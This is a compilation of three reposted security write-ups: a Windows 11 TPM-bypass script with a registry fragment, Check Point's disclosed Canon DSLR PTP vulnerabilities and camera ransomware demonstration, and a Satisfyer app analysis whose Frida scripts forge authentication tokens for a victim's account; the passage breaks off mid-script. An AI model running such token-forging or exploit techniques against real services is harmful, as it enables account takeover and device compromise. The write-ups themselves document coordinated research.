New Windows 11 install script bypasses TPM, system requirements

Original text by Lawrence Abrams

A new script allows you to install Windows 11 on devices with incompatible hardware, such as missing TPM 2.0, incompatible CPUs, or the lack of Secure Boot. Even better, the script also works on virtual machines, allowing you to upgrade to the latest Windows Insider build.

When Windows 11 was first announced, Microsoft released the operating system’s new system requirements, which included a TPM 2.0 security processor, Secure Boot, newer CPUs, and at least 64 GB of hard drive space.

As Microsoft realized that many people, especially those in the enterprise, would be testing Windows 11 preview builds on virtual machines, they exempted them from the system requirements.

However, Microsoft is now requiring compatible hardware even on virtual machines and taking a firm stance on its system requirements, going as far as to say that people who install Windows 11 on incompatible hardware may not get security updates.

For those willing to risk running Windows 11 on incompatible hardware, a script has been released that allows new installations and upgrades to bypass the operating system’s system requirements.

Script bypasses Windows 11 system requirements

This new script was released as part of the extremely useful Universal MediaCreationTool wrapper, a batch file that allows you to create an ISO for any version of Windows 10, with Windows 11 support added last week.

Universal MediaCreationTool wrapper
Source: BleepingComputer

While the main script of this open-source project is the ‘MediaCreationTool.bat’ used to create Windows ISOs, it also includes a script named ‘Skip_TPM_Check_on_Dynamic_Update.cmd,’ which configures the device to bypass compatible hardware checks.

When executed on a Windows 10 or Windows 11 device, the Skip_TPM_Check_on_Dynamic_Update.cmd script will perform a variety of tasks, including:

  • Creates the ‘AllowUpgradesWithUnsupportedTPMOrCPU’ value under the HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup Registry key and sets it to 1.
  • Registers a WMI event subscription named ‘Skip TPM Check on Dynamic Update’ that deletes the ‘C:\$WINDOWS.~BT\appraiserres.dll’ file when the vdsldr.exe executable is launched during Windows 11 setup.

It should be noted that the created WMI event subscription remains in effect until you run the Skip_TPM_Check_on_Dynamic_Update.cmd script again, which deletes it. You can do this after installing or upgrading Windows 11.
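
For reference, the registry half of the bypass can also be applied by hand. A minimal .reg fragment based on the key and value named above (merge at your own risk; this alone does not replicate the script's WMI subscription step):

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup]
"AllowUpgradesWithUnsupportedTPMOrCPU"=dword:00000001
```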

Before using this script, our attempt to upgrade a Windows 11 build 22449 virtual machine to the latest preview build failed because setup could not detect Secure Boot or a TPM 2.0 processor, and considered the system disk too small.

Windows 11 setup failing on incompatible hardware
Source: BleepingComputer

However, after running this script, we could install the latest Windows 11 preview build 22463 without a problem.

Windows 11 preview build 22463 installed in VirtualBox

Anyone who decides to use this bypass should be aware that this is an unsupported method to install Windows 11 and could lead to performance issues or other bugs when using the operating system. Furthermore, Microsoft may not provide security updates to unsupported devices, so your installation will likely be less secure.

Therefore, you should only use this method in test environments and not on production devices.

Say Cheese: Ransomware-ing a DSLR Camera

Original text by Eyal Itkin

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware?

And the answer is: Yes.

Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment.

Our research shows how an attacker in close proximity (WiFi), or an attacker who has already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how you would respond if attackers injected ransomware into both your computer and your camera, holding all of your pictures hostage unless you pay a ransom.

Below is a Video Demonstration of this attack:

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware.

Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol accessible only to USB-connected devices is now also PTP/IP, accessible to every WiFi-enabled device in close proximity.

In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that were possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer was paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality to spy on a victim.
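
Mende's point about the GUID is visible in the PTP/IP handshake itself. The sketch below packs an Init Command Request, the first packet a client sends on the well-known PTP/IP TCP port; the field layout here comes from public PTP/IP documentation, not from this research, and the GUID plus friendly name are essentially all the "authentication" the protocol has:

```python
import struct
import uuid

PTPIP_PORT = 15740           # well-known PTP/IP TCP port
INIT_COMMAND_REQUEST = 0x01  # PTP/IP packet type

def build_init_command_request(guid: bytes, friendly_name: str) -> bytes:
    """Pack a PTP/IP Init Command Request (little-endian):
    total length, packet type, 16-byte GUID,
    null-terminated UTF-16LE friendly name, protocol version."""
    assert len(guid) == 16
    body = (
        struct.pack("<I", INIT_COMMAND_REQUEST)
        + guid
        + friendly_name.encode("utf-16-le") + b"\x00\x00"
        + struct.pack("<I", 0x00010000)  # protocol version 1.0
    )
    return struct.pack("<I", 4 + len(body)) + body

pkt = build_init_command_request(uuid.uuid4().bytes, "attacker-pc")
print(len(pkt))  # 52
```

Sending this packet with a sniffed GUID is enough to start a PTP/IP session with a paired camera.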

In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them to take over the camera. Such a Remote Code Execution (RCE) scenario would allow attackers to do whatever they want with the camera, and infecting it with ransomware is only one of many options.

From an attacker’s perspective, the PTP layer looks like a great target:

  • PTP is an unauthenticated protocol that supports dozens of different complex commands.
  • Vulnerability in PTP can be equally exploited over USB and over WiFi.
  • The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers:

  • USB – For an attacker who has taken over your PC and now wants to propagate into your camera.
  • WiFi – For an attacker who places a rogue WiFi access point at a tourist attraction to infect your camera.

In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs.

Attackers are profit-maximisers: they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file on the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise: the file appeared to be encrypted or compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any pattern that might hint at uncompressed bootloader assembly code. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the rest of the file.
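
The "even byte distribution" observation can be quantified. A quick Shannon-entropy check, a standard firmware-triage step rather than something from the original article, separates plain code and text (well below 8 bits per byte) from encrypted or well-compressed data (close to 8):

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; values near 8.0 suggest encryption or compression."""
    if not data:
        return 0.0
    n = len(data)
    return sum(-(c / n) * math.log2(c / n) for c in Counter(data).values())

print(round(shannon_entropy(b"A" * 1024), 2))        # 0.0 -- a single repeated byte
print(round(shannon_entropy(os.urandom(65536)), 2))  # ~8.0 -- indistinguishable from noise
```

Running this over sliding windows of an update file also reveals any uncompressed region, such as a plaintext bootloader, as a dip in the entropy curve.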

Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even encryption. Encrypted firmware files are quite rare, due to the added key-management costs for the vendor.

Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted.

Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, but we also couldn’t find the key anywhere on the internet. Yet another dead end.

The next thing to check was whether ML had ported their software to our camera model, on the chance it contained debugging functionality that would help us dump the firmware. Although such a port has yet to be released, while reading through their forums and wiki we did find a breakthrough: ML developed something called Portable ROM Dumper, a custom firmware update file that, once loaded, dumps the memory of the camera onto the SD card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM Dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.

Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

  • The PTP layer is command-based, and every command has a unique numeric opcode.
  • The firmware contains many indicative strings, which eases the task of reverse-engineering it.
Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

Looking at the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, indicating that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them are very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context:

Figure 4 – Decompiled PTP handler, using the ptp_context object.

As we can see, the context contains function pointers that are used for:

  • Querying about the size of the incoming message.
  • Receiving the incoming message.
  • Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, so we can start looking for vulnerabilities in this much smaller set of commands.
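
The command-plus-arguments structure is what makes these handlers so approachable to probe. The sketch below packs a generic PTP command container using the layout from the public PTP specification (this is the standard container, not Canon's proprietary framing, which we do not reproduce here):

```python
import struct

PTP_CONTAINER_COMMAND = 1  # container type: command block

def build_ptp_command(opcode: int, transaction_id: int, *params: int) -> bytes:
    """Pack a generic PTP command container (little-endian):
    total length, container type, opcode, transaction ID, parameters."""
    assert len(params) <= 5, "PTP allows at most five parameters per command"
    body = struct.pack("<HHI", PTP_CONTAINER_COMMAND, opcode, transaction_id)
    body += b"".join(struct.pack("<I", p) for p in params)
    return struct.pack("<I", 4 + len(body)) + body

# e.g. the standard OpenSession command (opcode 0x1002) with session ID 1
pkt = build_ptp_command(0x1002, 0, 1)
print(pkt.hex())
```

For the 38 commands that also take an input buffer, a data-phase container with attacker-controlled payload follows the command container, which is exactly the data a fuzzer would mutate.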

Luckily for us, the parsing code for each command uses plain C code and is quite straightforward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100c

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive located right after our copy: our copy can modify the pKeywordsStringUnicode field into an arbitrary value and later trigger a call to free it.

This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.

CVE-2019-5999 – Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

  • Buffer Overflow over a global structure.
  • Buffer Overflow over the stack.
  • Buffer Overflow over the heap.

As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We had previously used the USB interface together with Canon’s “EOS Utility” software, so it seemed natural to attempt the exploit first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development.

Basic recap of our tools thus far: Our camera has no debugger and no ML on it. The camera hasn’t been opened, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line: we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started.

Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it.

We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my go-to debugger. It is an instruction-based debugger that I developed during the FAX research, and it proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we could use a file loader that loads Scout from the SD card, we will later need the same network connectivity for Scout anyway, so we might as well solve this issue now for both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi.

We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status when connecting over WiFi simply confuses the camera, especially when it doesn’t even support Bluetooth.

We went back to the drawing board. We could try to exploit one of the other two vulnerabilities; however, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of PTP command handlers again, this time looking at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000 – Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial: illegal packets are only logged, not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊
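
The bug class deserves a sketch. Modeled in Python with invented names (the real handler is C code on the camera), the mistake is a size check that feeds a log message but never aborts, so the oversized copy still happens:

```python
EXPECTED_SIZE = 100

def handle_host_info_buggy(msg: bytes, stack_buf: bytearray) -> None:
    """Flawed pattern: the size check only logs, it never rejects."""
    if len(msg) != EXPECTED_SIZE:
        print(f"warning: unexpected message size {len(msg)}")
        # BUG: no 'return' here, so execution falls through to the copy
    stack_buf[: len(msg)] = msg  # models the unbounded stack copy in C

def handle_host_info_fixed(msg: bytes, stack_buf: bytearray) -> None:
    """Corrected pattern: reject the packet, don't just log it."""
    if len(msg) != EXPECTED_SIZE:
        print(f"error: dropping message of size {len(msg)}")
        return
    stack_buf[: len(msg)] = msg

buf = bytearray(EXPECTED_SIZE)
handle_host_info_buggy(b"A" * 150, buf)
print(len(buf))  # 150: the buffer "grew", i.e. the overflow happened
```

In Python the bytearray merely grows; in the camera's C code the same fall-through smashes the stack frame.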

Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001 – Buffer Overflow in SendAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.

Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better than we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used to encrypt a malicious firmware update and then sign it so that it passes the verification checks.
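
The core issue is that verification and signing share one secret. The sketch below uses an HMAC purely as an illustrative stand-in for Canon's actual scheme (which is not reproduced here): anyone who extracts the key the device uses to verify updates can also produce updates that verify:

```python
import hashlib
import hmac

# Stand-in for the key recovered from the camera; the real key is not reproduced here.
FIRMWARE_KEY = b"key-extracted-from-the-device"

def sign(blob: bytes) -> bytes:
    """Compute an update's authentication tag (HMAC as an illustrative stand-in)."""
    return hmac.new(FIRMWARE_KEY, blob, hashlib.sha256).digest()

def device_verifies(blob: bytes, tag: bytes) -> bool:
    """The device recomputes the tag with the *same* key it uses for decryption."""
    return hmac.compare_digest(sign(blob), tag)

malicious = b"patched firmware image"
tag = sign(malicious)                   # attacker signs with the extracted key
print(device_verifies(malicious, tag))  # True -- the forged update passes verification
```

An asymmetric scheme (the device holding only a public verification key) would not have this property, which is why symmetric update verification fails once the key leaks.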

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know the correct signatures for each part of the firmware update file, effectively gaining a signing primitive from the camera itself.

Since we only had one camera, this was a tricky part: we wanted to test our own custom home-made firmware update file, but we didn’t want to brick the camera. Luckily for us, we could start small. Figure 11 shows our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM Dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set up a rogue WiFi access point. This can easily be achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect to. Once the attacker is within the same LAN as the camera, they can initiate the exploit.

Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

  • 31 March 2019 – Vulnerabilities were reported to Canon.
  • 14 May 2019 – Canon confirmed all of our vulnerabilities.
  • From this point onward, both parties worked together to patch the vulnerabilities.
  • 08 July 2019 – We verified and approved Canon’s patch.
  • 06 August 2019 – Canon published the patch as part of an official security advisory.

Canon’s Security Advisory

Here are the links to the official security advisory that was published by Canon:

We strongly recommend that everyone patch their affected cameras.

Conclusion

During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and a widespread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption: using Magic Lantern’s ROM Dumper, and later the functions from the firmware itself, we were able to bypass both the encryption and the verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I re-discovered the butthax talk, which covered security aspects of Lovense devices. I felt so inspired that I decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends, and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use it. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many Controller classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the ToyHolderController class, like many others, implements the sendBuffer() method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");

        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst);
        console.log("Buffer: " + stringbuilder.toString());

        // call original
        this.sendBuffer(lst);

    }
});

Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated with a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 66 is the maximum value for the vibration level. As an example of how the communication could be manipulated with Frida, I decided to modify the list of bytes sent to the device to use the value 100 instead:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');
    var listclazz = Java.use("java.util.List");
    var arrayclazz = Java.use("java.util.Arrays");

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte array containing the value 100
        var byteList = Java.use('java.util.ArrayList').$new();
        var theByte = Java.use('java.lang.Byte').valueOf(100);
        byteList.add(theByte);
        byteList.add(theByte);
        byteList.add(theByte);
        byteList.add(theByte);

        lst.set(0, byteList);
        lst.set(1, byteList);

        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst);
        console.log("Buffer: " + stringbuilder.toString());

        // call the original method with the modified parameter
        this.sendBuffer(lst);

    }
});

This worked and changed the script’s output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, overly long lists, or other malformed input caused the device to ignore these values.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.
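
Summing up the observed frame format: each frame is one list of level bytes per motor, and out-of-range values are ignored by the device. A small hypothetical helper (the clamping range is inferred from the experiments above, not taken from the app's code) that builds a frame the device will accept:

```python
MAX_LEVEL = 66  # highest vibration level the device appeared to accept

def build_vibration_frame(motor_levels: list[list[int]]) -> list[list[int]]:
    """One list of level bytes per motor, clamped to the observed valid range."""
    return [[min(max(level, 0), MAX_LEVEL) for level in motor] for motor in motor_levels]

print(build_vibration_frame([[33, 33, 33, 33], [100, -5, 25, 25]]))
# [[33, 33, 33, 33], [66, 0, 25, 25]]
```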

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. It’s interesting that the client and not the server is responsible for generating the initial JWT:

public final class JwtTokenBuilder {
    public JwtTokenBuilder() {
        System.loadLibrary("native-lib");
    }

    [...]

    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            [...]
            return object;
        }
        [...];
    }
}

As can be seen, createJwtToken() uses a JWT signing key originating from a native library called libnative-lib.so. It then signs and uses JWTs like the following:

{
   "alg":"HS512"
}.{
   "sub":"Satisfyer",
   "auth":"ROLE_ANONYMOUS_CLIENT",
   "exp":1624144087
}

After reviewing the authentication flow, I’ve determined that there exist (at least) these roles:

  • ROLE_ANONYMOUS_CLIENT is any client that communicates with the Satisfyer API and is not logged in.
  • ROLE_USER is a client that has successfully logged in. Every API request is scoped to information that’s accessible to this specific user account.

An authentication token for a signed-in user looks as follows:

{
   "alg":"HS512"
}.{
   "sub":"DieterBohlen1337",
   "auth":"ROLE_USER",
   "user_id":282[...],
   "exp":1624194072
}

While the Android app is responsible for generating the initial JWT with role ROLE_ANONYMOUS_CLIENT, the server responds with a new JWT after successfully performing a login. This new JWT uses the role ROLE_USER, as can be seen above.

Would it be possible to use the signing key residing in the shared library to sign JWTs not just with ROLE_ANONYMOUS_CLIENT, but also with ROLE_USER? This would allow an attacker to interact with the API in the name of someone else. Let’s find out.

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as ROLE_USER. Please note the value of the statusDescription in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the JwtBuilder interface to create and sign JWTs. The only class implementing this interface is DefaultJwtBuilder, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the auth claim from ROLE_ANONYMOUS_CLIENT to ROLE_USER.
  • Add a hook to add another claim called user_id, indicating the desired user ID of the victim’s account.
  • Change the JWT subject (sub) from Satisfyer (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var clazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    clazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;
    }

    var clazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    clazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");
    }

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");
    console.log(jwtTokenBuilder.createJwtToken());

    console.log("[+] Hooking complete")
});

This worked just fine and generated a forged JWT when starting the app:

$ python3 forge_token.py
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
eyJhb[...]
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag from the View class, which is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app so that I could use features like remote control and calls more easily. I came up with a Frida script to generate a forged JWT and add it to the app’s local storage. This happens just before the app checks whether a valid JWT already exists using the hasToken() method:

var clazz = Java.use("com.coreteka.satisfyer.domain.storage.impl.AuthStorageImpl");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
